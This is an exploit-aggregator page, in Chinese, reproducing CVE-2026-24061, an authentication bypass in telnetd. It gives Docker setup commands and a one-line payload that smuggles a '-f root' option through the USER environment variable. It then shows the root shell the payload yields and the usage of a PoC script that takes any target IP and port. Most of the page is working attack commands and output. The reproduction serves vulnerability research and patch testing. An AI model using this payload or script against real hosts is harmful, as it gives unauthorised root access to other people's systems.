## https://sploitus.com/exploit?id=E1D9358D-8372-5F71-8471-ED079FB4C438
# CVE-2026-24061
## 复现步骤
构建镜像
```
docker build -t telnetd-bypass .
```
启动容器
```
docker run -it --rm \
--name telnetd-vuln \
--privileged \
-p 23:23 \
telnetd-bypass
```
发送`payload`
```
USER='-f root' telnet -a 127.0.0.1 23
```
返回
```
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.10.14-linuxkit (c910afb30330) (pts/1)
Linux c910afb30330 6.10.14-linuxkit #1 SMP Tue Oct 14 07:32:13 UTC 2025 aarch64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 22 05:55:47 UTC 2026 from 172.64.155.119 on pts/1
root@c910afb30330:~#
```
## 复现脚本:
`python3 poc.py -h`
```
usage: poc.py [-h] -t TARGET [-p PORT]
CVE-2026-24061 Telnet NEW-ENVIRON RCE 漏洞检测工具
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标 IP 地址
-p PORT, --port PORT 目标端口 (默认: 23)
示例:
poc.py -t 192.168.1.100 -p 23
poc.py --target 127.0.0.1 --port 23
```
# 参考链接:
- https://www.openwall.com/lists/oss-security/2026/01/20/2
- https://mp.weixin.qq.com/s/PA5EhntsCyWfQT2kTE1yNA